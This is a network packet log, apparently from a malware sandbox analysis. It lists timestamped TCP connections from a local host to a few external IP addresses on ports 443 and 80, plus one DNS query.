Oct 3, 2024 12:28:54.873317003 CEST	443	49778	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:54.873439074 CEST	49778	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:54.874497890 CEST	49778	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:54.874531984 CEST	443	49778	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:54.875309944 CEST	443	49778	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:54.876115084 CEST	49778	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:54.876157999 CEST	49778	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:54.876357079 CEST	443	49778	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:55.156850100 CEST	443	49778	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:55.157015085 CEST	443	49778	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:55.157042027 CEST	49778	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:55.157042027 CEST	49778	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:55.157119989 CEST	443	49778	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:55.157161951 CEST	49778	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:55.157179117 CEST	443	49778	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:55.181911945 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:55.181960106 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:55.182055950 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:55.182391882 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:55.182423115 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:55.805977106 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:55.806086063 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:55.807934999 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:55.807965040 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:55.808298111 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:55.812736034 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:55.812777042 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:55.812832117 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.094829082 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.094897032 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.095007896 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.095048904 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.167359114 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.167398930 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.186989069 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.187021017 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.187203884 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.187268972 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.187381029 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.187438011 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.187463045 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.187468052 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.187490940 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.187522888 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.187522888 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.224724054 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.224783897 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.224848986 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.224872112 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.224899054 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.232047081 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.232069016 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.232130051 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.232146978 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.232175112 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.278124094 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.278156996 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.278250933 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.278320074 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.278354883 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.279002905 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.279025078 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.279043913 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.279072046 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.279092073 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.279117107 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.280246973 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.280267000 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.280317068 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.280333996 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.280359983 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.293705940 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.293752909 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.293806076 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.293833017 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.293855906 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.300966978 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.301142931 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.301181078 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.301256895 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.301294088 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.301340103 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.301373005 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.301389933 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.364000082 CEST	49780	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.364028931 CEST	443	49780	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.364093065 CEST	49780	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.364360094 CEST	49780	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.364368916 CEST	443	49780	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.984086037 CEST	443	49780	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.984193087 CEST	49780	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.985294104 CEST	49780	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.985305071 CEST	443	49780	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.985975981 CEST	443	49780	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:56.986731052 CEST	49780	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.986761093 CEST	49780	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:56.986764908 CEST	443	49780	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:57.278460979 CEST	443	49780	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:57.278656960 CEST	443	49780	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:57.278747082 CEST	49780	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:57.278819084 CEST	49780	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:57.278834105 CEST	443	49780	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:57.278845072 CEST	49780	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:57.278850079 CEST	443	49780	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:57.285598993 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:57.285703897 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:57.285793066 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:57.286006927 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:57.286027908 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:57.962135077 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:57.962239027 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:57.963608980 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:57.963641882 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:57.964413881 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:57.965574026 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:57.965621948 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:57.965764046 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:58.240400076 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:58.240530014 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:58.240571976 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:58.240648985 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:58.240700006 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:58.240700006 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:58.240720987 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:58.240739107 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:58.244060993 CEST	49782	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:58.244107962 CEST	443	49782	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:58.244432926 CEST	49782	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:58.244674921 CEST	49782	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:58.244703054 CEST	443	49782	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:58.985193968 CEST	443	49782	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:58.985282898 CEST	49782	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:58.987214088 CEST	49782	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:58.987245083 CEST	443	49782	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:58.987612963 CEST	443	49782	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:58.988564014 CEST	49782	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:58.988604069 CEST	49782	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:58.988620043 CEST	443	49782	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:59.309488058 CEST	443	49782	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:59.309643030 CEST	443	49782	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:59.309668064 CEST	49782	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:59.309739113 CEST	443	49782	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:59.309770107 CEST	49782	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:59.309787035 CEST	443	49782	23.145.40.162	192.168.2.4
Oct 3, 2024 12:29:02.555815935 CEST	49783	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:29:02.555851936 CEST	443	49783	23.145.40.162	192.168.2.4
Oct 3, 2024 12:29:02.556030989 CEST	49783	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:29:02.559638023 CEST	49783	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:29:02.559664965 CEST	443	49783	23.145.40.162	192.168.2.4
Oct 3, 2024 12:29:03.257486105 CEST	443	49783	23.145.40.162	192.168.2.4
Oct 3, 2024 12:29:03.257571936 CEST	49783	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:29:03.265636921 CEST	49783	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:29:03.265651941 CEST	443	49783	23.145.40.162	192.168.2.4
Oct 3, 2024 12:29:03.266042948 CEST	443	49783	23.145.40.162	192.168.2.4
Oct 3, 2024 12:29:03.334347010 CEST	49783	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:29:03.334391117 CEST	49783	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:29:03.334465981 CEST	443	49783	23.145.40.162	192.168.2.4
Oct 3, 2024 12:29:03.624571085 CEST	443	49783	23.145.40.162	192.168.2.4
Oct 3, 2024 12:29:03.624665022 CEST	443	49783	23.145.40.162	192.168.2.4
Oct 3, 2024 12:29:03.625626087 CEST	49783	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:29:03.758204937 CEST	49783	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:29:03.758229017 CEST	443	49783	23.145.40.162	192.168.2.4
Oct 3, 2024 12:29:03.758265972 CEST	49783	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:29:03.758275986 CEST	443	49783	23.145.40.162	192.168.2.4
Oct 3, 2024 12:29:29.779947042 CEST	49784	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:29.785386086 CEST	80	49784	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:29.785476923 CEST	49784	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:29.785671949 CEST	49784	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:29.785707951 CEST	49784	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:29.790777922 CEST	80	49784	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:29.791695118 CEST	80	49784	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:31.304580927 CEST	80	49784	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:31.304622889 CEST	80	49784	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:31.304806948 CEST	49784	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:31.304915905 CEST	49784	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:31.309770107 CEST	80	49784	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:36.314837933 CEST	49785	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:36.320194960 CEST	80	49785	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:36.320300102 CEST	49785	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:36.320461988 CEST	49785	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:36.320506096 CEST	49785	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:36.325355053 CEST	80	49785	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:36.325386047 CEST	80	49785	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:38.126115084 CEST	80	49785	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:38.126545906 CEST	80	49785	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:38.126600981 CEST	49785	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:38.126640081 CEST	49785	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:38.137401104 CEST	80	49785	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:44.095274925 CEST	49786	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:44.101519108 CEST	80	49786	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:44.101691961 CEST	49786	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:44.101727009 CEST	49786	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:44.101746082 CEST	49786	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:44.106717110 CEST	80	49786	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:44.106890917 CEST	80	49786	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:46.810496092 CEST	80	49786	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:46.810760975 CEST	80	49786	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:46.811496973 CEST	49786	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:46.811531067 CEST	49786	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:46.816505909 CEST	80	49786	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:53.742500067 CEST	49787	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:53.764060974 CEST	80	49787	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:53.764166117 CEST	49787	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:53.764369011 CEST	49787	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:53.764405012 CEST	49787	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:53.778717995 CEST	80	49787	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:53.781718016 CEST	80	49787	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:58.317342043 CEST	80	49787	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:58.317982912 CEST	80	49787	58.151.148.90	192.168.2.4
Oct 3, 2024 12:29:58.318140984 CEST	49787	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:58.318141937 CEST	49787	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:29:58.323185921 CEST	80	49787	58.151.148.90	192.168.2.4
Oct 3, 2024 12:30:10.969984055 CEST	49788	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:10.974917889 CEST	80	49788	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:10.975018978 CEST	49788	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:10.975163937 CEST	49788	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:10.975222111 CEST	49788	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:10.980628014 CEST	80	49788	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:10.980941057 CEST	80	49788	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:12.094862938 CEST	80	49788	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:12.094964027 CEST	80	49788	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:12.094994068 CEST	80	49788	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:12.095027924 CEST	80	49788	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:12.095185041 CEST	49788	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:12.095185041 CEST	49788	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:12.095185041 CEST	49788	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:12.095282078 CEST	49788	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:12.342668056 CEST	80	49788	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:14.304255962 CEST	49789	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:14.304307938 CEST	443	49789	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:14.304368019 CEST	49789	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:14.304656029 CEST	49789	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:14.304677010 CEST	443	49789	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:14.897686958 CEST	443	49789	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:14.897958040 CEST	49789	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:14.899064064 CEST	49789	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:14.899091959 CEST	443	49789	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:14.899436951 CEST	443	49789	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:14.936276913 CEST	49789	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:14.936276913 CEST	49789	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:14.936496973 CEST	443	49789	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:15.179527998 CEST	443	49789	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:15.179635048 CEST	443	49789	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:15.179725885 CEST	49789	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:15.179969072 CEST	49789	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:15.179987907 CEST	443	49789	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:15.180003881 CEST	49789	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:15.180011034 CEST	443	49789	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:20.001126051 CEST	49790	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:20.006545067 CEST	80	49790	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:20.006628036 CEST	49790	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:20.006772995 CEST	49790	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:20.006814003 CEST	49790	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:20.011827946 CEST	80	49790	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:20.011857033 CEST	80	49790	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:20.785784006 CEST	80	49790	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:20.786020041 CEST	80	49790	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:20.786072969 CEST	49790	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:20.786149979 CEST	49790	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:20.790985107 CEST	80	49790	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:30.522428989 CEST	49791	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:30.522542000 CEST	443	49791	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:30.522648096 CEST	49791	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:30.522945881 CEST	49791	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:30.522984982 CEST	443	49791	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:31.939762115 CEST	443	49791	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:31.939894915 CEST	49791	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:31.974206924 CEST	49791	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:31.974287987 CEST	443	49791	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:31.975250959 CEST	443	49791	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:31.978749037 CEST	49791	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:31.978796005 CEST	49791	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:31.978940010 CEST	443	49791	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:32.301404953 CEST	443	49791	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:32.301784992 CEST	443	49791	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:32.301841974 CEST	49791	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:32.301944971 CEST	49791	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:32.301966906 CEST	443	49791	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:32.301987886 CEST	49791	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:32.301995993 CEST	443	49791	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:37.642096996 CEST	49792	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:37.647506952 CEST	80	49792	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:37.647599936 CEST	49792	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:37.647725105 CEST	49792	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:37.647758007 CEST	49792	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:37.652602911 CEST	80	49792	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:37.652729988 CEST	80	49792	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:38.457832098 CEST	80	49792	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:38.459638119 CEST	80	49792	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:38.459805012 CEST	49792	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:38.459901094 CEST	49792	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:38.464757919 CEST	80	49792	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:48.977835894 CEST	49793	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:48.977900982 CEST	443	49793	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:48.977972984 CEST	49793	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:48.978336096 CEST	49793	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:48.978354931 CEST	443	49793	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:49.575565100 CEST	443	49793	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:49.575752974 CEST	49793	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:49.576826096 CEST	49793	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:49.576854944 CEST	443	49793	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:49.577187061 CEST	443	49793	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:49.577943087 CEST	49793	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:49.577943087 CEST	49793	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:49.578048944 CEST	443	49793	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:49.938839912 CEST	443	49793	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:49.939022064 CEST	443	49793	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:49.939169884 CEST	49793	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:49.939214945 CEST	49793	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:49.939239979 CEST	443	49793	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:49.939256907 CEST	49793	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:30:49.939265013 CEST	443	49793	23.145.40.162	192.168.2.4
Oct 3, 2024 12:30:54.834140062 CEST	49794	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:54.839312077 CEST	80	49794	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:54.839437962 CEST	49794	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:54.839607954 CEST	49794	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:54.839627981 CEST	49794	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:54.844468117 CEST	80	49794	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:54.844896078 CEST	80	49794	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:55.625368118 CEST	80	49794	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:55.626084089 CEST	80	49794	109.175.29.39	192.168.2.4
Oct 3, 2024 12:30:55.626266003 CEST	49794	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:55.626266003 CEST	49794	80	192.168.2.4	109.175.29.39
Oct 3, 2024 12:30:55.631315947 CEST	80	49794	109.175.29.39	192.168.2.4
Oct 3, 2024 12:31:07.086177111 CEST	49795	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:31:07.086278915 CEST	443	49795	23.145.40.162	192.168.2.4
Oct 3, 2024 12:31:07.086361885 CEST	49795	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:31:07.086680889 CEST	49795	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:31:07.086709976 CEST	443	49795	23.145.40.162	192.168.2.4
Oct 3, 2024 12:31:07.855603933 CEST	443	49795	23.145.40.162	192.168.2.4
Oct 3, 2024 12:31:07.855705023 CEST	49795	443	192.168.2.4	23.145.40.162

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 12:27:23.361846924 CEST	57666	53	192.168.2.4	1.1.1.1
